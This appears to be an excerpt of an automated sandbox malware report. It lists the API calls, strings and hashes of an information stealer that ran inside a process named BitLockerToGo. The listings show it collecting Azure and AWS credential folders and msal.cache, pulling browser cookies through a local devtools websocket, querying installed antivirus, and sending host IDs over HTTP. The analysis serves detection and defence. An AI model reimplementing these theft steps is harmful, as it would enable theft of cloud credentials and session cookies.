                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E49DE: InternetCrackUrlA.WININET(000000FF,00000000), ref: 008E4A36
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2143: lstrcpy.KERNEL32(00000000,00000000), ref: 008F2169
                                                                                                                                                                                                                                                                                                                    • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 008E4AF5
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?), ref: 008E4B13
                                                                                                                                                                                                                                                                                                                    • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 008E4CAB
                                                                                                                                                                                                                                                                                                                    • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 008E4CEF
                                                                                                                                                                                                                                                                                                                    • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 008E4D1D
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrlen.KERNEL32(?,?,?,008F8FD9,abc_,00000000,00917786,?,?,?,?,008F9D6E), ref: 008F2279
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcpy.KERNEL32(00000000,?), ref: 008F22A1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcat.KERNEL32(?,00000000), ref: 008F22AC
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F21E9: lstrcpy.KERNEL32(00000000,?), ref: 008F2219
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2223: lstrcpy.KERNEL32(00000000,?), ref: 008F2251
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2223: lstrcat.KERNEL32(?,?), ref: 008F225B
                                                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?,00917A2B,",build_id,0091898C,------,00918980,",hwid,0091896C,------), ref: 008E5016
                                                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?,?,00000000), ref: 008E5029
                                                                                                                                                                                                                                                                                                                    • HttpSendRequestA.WININET(00000000,?,00000000), ref: 008E5037
                                                                                                                                                                                                                                                                                                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 008E5094
                                                                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 008E509F
                                                                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(?), ref: 008E50B6
                                                                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(?), ref: 008E50C2
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileOptionReadSend
                                                                                                                                                                                                                                                                                                                    • String ID: "$"$------$------$------$build_id$hwid
                                                                                                                                                                                                                                                                                                                    • API String ID: 3006978581-3960666492
                                                                                                                                                                                                                                                                                                                    • Opcode ID: cb1caf1a736a09b1c1e25d543328e23be358b8e9b89446ab2d199bb9f985225f
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 3a2a964ecaa71d8417dac6e7b75469e4d44c0cde81a7b5fb6c608665d1e957d9
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cb1caf1a736a09b1c1e25d543328e23be358b8e9b89446ab2d199bb9f985225f
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 26029131D1506E9ACB20EB29DC42AEDB7B8FF04304F0554E1A648B3266DA757F868FD1
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • __EH_prolog3_catch_GS.LIBCMT ref: 008F346A
                                                                                                                                                                                                                                                                                                                    • CoInitializeEx.COMBASE(00000000,00000000), ref: 008F347B
                                                                                                                                                                                                                                                                                                                    • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 008F348C
                                                                                                                                                                                                                                                                                                                    • CoCreateInstance.COMBASE(00913F70,00000000,00000001,00913EA0,?), ref: 008F34A6
                                                                                                                                                                                                                                                                                                                    • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 008F34DC
                                                                                                                                                                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 008F3537
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F33B3: __EH_prolog3_catch.LIBCMT ref: 008F33BA
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F33B3: CoCreateInstance.COMBASE(00914220,00000000,00000001,0091C180,?), ref: 008F33DD
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F33B3: SysAllocString.OLEAUT32(?), ref: 008F33EA
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F33B3: _wtoi64.MSVCRT ref: 008F341D
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F33B3: SysFreeString.OLEAUT32(?), ref: 008F3436
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F33B3: SysFreeString.OLEAUT32(00000000), ref: 008F343D
                                                                                                                                                                                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 008F3566
                                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 008F3572
                                                                                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008F3579
                                                                                                                                                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 008F35B8
                                                                                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 008F35A5
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2143: lstrcpy.KERNEL32(00000000,00000000), ref: 008F2169
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: String$CreateFreeHeapInitializeInstanceTimeVariant$AllocAllocateBlanketClearFileH_prolog3_catchH_prolog3_catch_InitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
                                                                                                                                                                                                                                                                                                                    • String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$Unknown$Unknown$WQL
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 008F8231
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F3A18: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 008F3A59
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 008F8250
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,\.azure\), ref: 008F826D
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F7D20: wsprintfA.USER32 ref: 008F7D67
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F7D20: FindFirstFileA.KERNEL32(?,?), ref: 008F7D7E
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F7D20: StrCmpCA.SHLWAPI(?,00917AF4), ref: 008F7D9F
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F7D20: StrCmpCA.SHLWAPI(?,00917AF8), ref: 008F7DB9
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F7D20: wsprintfA.USER32 ref: 008F7DE0
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F7D20: StrCmpCA.SHLWAPI(?,009176B6), ref: 008F7DF4
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F7D20: wsprintfA.USER32 ref: 008F7E11
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F7D20: PathMatchSpecA.SHLWAPI(?,?), ref: 008F7E3E
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F7D20: lstrcat.KERNEL32(?), ref: 008F7E74
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F7D20: lstrcat.KERNEL32(?,00917B10), ref: 008F7E86
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F7D20: lstrcat.KERNEL32(?,?), ref: 008F7E99
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F7D20: lstrcat.KERNEL32(?,00917B14), ref: 008F7EAB
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F7D20: lstrcat.KERNEL32(?,?), ref: 008F7EBF
                                                                                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 008F82A5
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 008F82C7
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,\.aws\), ref: 008F82E4
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F7D20: wsprintfA.USER32 ref: 008F7E28
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F7D20: CopyFileA.KERNEL32(?,?,00000001), ref: 008F7F78
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F7D20: DeleteFileA.KERNEL32(?), ref: 008F7FEC
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F7D20: FindNextFileA.KERNEL32(?,?), ref: 008F804E
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F7D20: FindClose.KERNEL32(?), ref: 008F8062
                                                                                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 008F8319
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 008F833B
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,\.IdentityService\), ref: 008F8358
                                                                                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 008F838D
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: lstrcat$File_memsetwsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                                                                                                                                                                                                                                                    • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2143: lstrcpy.KERNEL32(00000000,00000000), ref: 008F2169
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F38A6: GetSystemTime.KERNEL32(?,00917807,?), ref: 008F38D5
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrlen.KERNEL32(?,?,?,008F8FD9,abc_,00000000,00917786,?,?,?,?,008F9D6E), ref: 008F2279
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcpy.KERNEL32(00000000,?), ref: 008F22A1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcat.KERNEL32(?,00000000), ref: 008F22AC
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2223: lstrcpy.KERNEL32(00000000,?), ref: 008F2251
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2223: lstrcat.KERNEL32(?,?), ref: 008F225B
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F21E9: lstrcpy.KERNEL32(00000000,?), ref: 008F2219
                                                                                                                                                                                                                                                                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 008EBBD3
                                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 008EBCDD
                                                                                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008EBCE4
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,009185A4,00000000), ref: 008EBD95
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,009185A8), ref: 008EBDBD
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,?), ref: 008EBDE1
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,009185AC), ref: 008EBDED
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,?), ref: 008EBDF7
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,009185B0), ref: 008EBE03
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,?), ref: 008EBE0D
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,009185B4), ref: 008EBE19
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,?), ref: 008EBE23
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,009185B8), ref: 008EBE2F
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,?), ref: 008EBE39
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,009185BC), ref: 008EBE45
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,?), ref: 008EBE4F
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,009185C0), ref: 008EBE5B
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,?), ref: 008EBE65
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,009185C4), ref: 008EBE71
                                                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(00000000), ref: 008EBEC3
                                                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?), ref: 008EBEDE
                                                                                                                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 008EBF21
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 1956182324-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: b8d9b6494b7cef3b521706f756d7f8888fdd7672120e3152c9e254c4f1e662e6
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 6db0a7e14c3eaca04892a893d8eb79bbf8f8e4a0c47b466c5c1f6c289d4c5fab
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b8d9b6494b7cef3b521706f756d7f8888fdd7672120e3152c9e254c4f1e662e6
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 47C10532904108ABDF11BBA9ED4A8EE7B79FF05701F210425FA01F3162DF716E569B91
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • strtok_s.MSVCRT ref: 008F5317
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,true), ref: 008F53D9
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F21A5: lstrlen.KERNEL32(?,?,008F9098,009177FE,00917787,?,?,?,?,008F9D6E), ref: 008F21AB
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F21A5: lstrcpy.KERNEL32(00000000,00000000), ref: 008F21DD
                                                                                                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(?,?), ref: 008F549B
                                                                                                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 008F54CB
                                                                                                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 008F5506
                                                                                                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 008F5541
                                                                                                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 008F557C
                                                                                                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 008F55B7
                                                                                                                                                                                                                                                                                                                    • strtok_s.MSVCRT ref: 008F56CB
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: lstrcpy$strtok_s$lstrlen
                                                                                                                                                                                                                                                                                                                    • String ID: false$true
                                                                                                                                                                                                                                                                                                                    • API String ID: 2116072422-2658103896
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 949201177b95adeaa8828183edef28686c55f0e616f3e4f9c7e07095fba8417a
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 58e0d297456022b37dd0309d684740141f942bf1e677fd8e0ae45eb0a544e3ba
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 949201177b95adeaa8828183edef28686c55f0e616f3e4f9c7e07095fba8417a
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F8B1397590421CABDB64EB28DC89AE973B8FB18300F1005E5E649E7262DF71AF858F51
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E7E0E: InternetOpenA.WININET(WebSocketClient,00000001,00000000,00000000,00000000), ref: 008E7E3C
                                                                                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 008E8C21
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,ws://localhost:9223), ref: 008E8C3B
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 008E8C5A
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F045E: _memmove.LIBCMT ref: 008F0478
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: lstrcat$InternetOpen_memmove_memset
                                                                                                                                                                                                                                                                                                                    • String ID: .txt$/devtools$Cookies$localhost$ws://localhost:9223
                                                                                                                                                                                                                                                                                                                    • API String ID: 216805803-4155744131
                                                                                                                                                                                                                                                                                                                    • Opcode ID: df808ebf17490b4419ab7d326c63cdfb4a989d980ab852148e6ce550ed5faa75
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 746416756147422560c295ef0f694a5a662a65155aa54433e57d3f20f7299644
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: df808ebf17490b4419ab7d326c63cdfb4a989d980ab852148e6ce550ed5faa75
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 51611C71D0462CAECB20EB69DD46BEAB7B8FB49706F4044D5A608E3181DA709BC5CF51
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2175: lstrcpy.KERNEL32(00000000,?), ref: 008F2194
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E49DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 008E4A10
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E49DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 008E4A16
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E49DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 008E4A1C
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E49DE: lstrlen.KERNEL32(000000FF,00000000,?), ref: 008E4A2E
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E49DE: InternetCrackUrlA.WININET(000000FF,00000000), ref: 008E4A36
                                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 008E51A6
                                                                                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008E51AD
                                                                                                                                                                                                                                                                                                                    • InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 008E51CF
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?), ref: 008E51E9
                                                                                                                                                                                                                                                                                                                    • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 008E5219
                                                                                                                                                                                                                                                                                                                    • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 008E5258
                                                                                                                                                                                                                                                                                                                    • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 008E5288
                                                                                                                                                                                                                                                                                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008E5293
                                                                                                                                                                                                                                                                                                                    • HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 008E52BC
                                                                                                                                                                                                                                                                                                                    • InternetReadFile.WININET(?,?,00000400,?), ref: 008E5302
                                                                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(?), ref: 008E5361
                                                                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(?), ref: 008E536D
                                                                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(?), ref: 008E5379
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Internet$CloseHandleHttp$HeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
                                                                                                                                                                                                                                                                                                                    • String ID: GET
                                                                                                                                                                                                                                                                                                                    • API String ID: 442264750-1805413626
                                                                                                                                                                                                                                                                                                                    • Opcode ID: da2419623c79619b50b15a1c285ffb995a7c2bab2534aed7733a6134afed8032
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 930137bab519c5c7edfb03f06ad019e82bd4b852fbb1f5d4d28ea4fbc7c8c782
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: da2419623c79619b50b15a1c285ffb995a7c2bab2534aed7733a6134afed8032
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2D51F57190092CAFDB209F65DC85BEFBBB8FB09346F0440A5BA09E3251DA715F918F91
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 008F35FA
                                                                                                                                                                                                                                                                                                                    • CoInitializeEx.COMBASE(00000000,00000000), ref: 008F3609
                                                                                                                                                                                                                                                                                                                    • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 008F361A
                                                                                                                                                                                                                                                                                                                    • CoCreateInstance.COMBASE(00913F70,00000000,00000001,00913EA0,?), ref: 008F3634
                                                                                                                                                                                                                                                                                                                    • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 008F366A
                                                                                                                                                                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 008F36B9
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F399E: LocalAlloc.KERNEL32(00000040,00000005,?,?,008F36DC,?), ref: 008F39A6
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F399E: CharToOemW.USER32(?,00000000), ref: 008F39B2
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2143: lstrcpy.KERNEL32(00000000,00000000), ref: 008F2169
                                                                                                                                                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 008F36E7
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: InitializeVariant$AllocBlanketCharClearCreateH_prolog3_catchInitInstanceLocalProxySecuritylstrcpy
                                                                                                                                                                                                                                                                                                                    • String ID: Select * From AntiVirusProduct$Unknown$Unknown$Unknown$WQL$displayName$root\SecurityCenter2
                                                                                                                                                                                                                                                                                                                    • API String ID: 4288110179-315474579
                                                                                                                                                                                                                                                                                                                    • Opcode ID: aeb2c5211416a93ce3913d077f3074ba047702b632b2f1ed13a562160f0a0e6a
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 91b01f208c12523ac27bc47c4cc764b319e202e81834b220155f1d67858c1c61
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aeb2c5211416a93ce3913d077f3074ba047702b632b2f1ed13a562160f0a0e6a
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A7313B71B0424ABBDB10ABA5CC49EEFBB79FFC5B14F104509F211E62A0D7B59A41CB20
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 008E1297
                                                                                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 008E12A6
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,0091BC0C), ref: 008E12C0
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,0091BC10), ref: 008E12CE
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,0091BC14), ref: 008E12DC
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,0091BC18), ref: 008E12EA
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,0091BC1C), ref: 008E12F8
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,0091BC20), ref: 008E1306
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,0091BC24), ref: 008E1314
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,0091BC28), ref: 008E1322
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,0091BC2C), ref: 008E1330
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,0091BC30), ref: 008E133E
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,0091BC34), ref: 008E134C
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,0091BC38), ref: 008E135A
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,0091BC3C), ref: 008E1368
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F28E1: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,008E1375), ref: 008F28ED
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F28E1: RtlAllocateHeap.NTDLL(00000000), ref: 008F28F4
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F28E1: GetComputerNameA.KERNEL32(00000000,008E1375), ref: 008F2908
                                                                                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 008E13D3
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: lstrcat$HeapProcess_memset$AllocateComputerExitName
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 2891980384-0
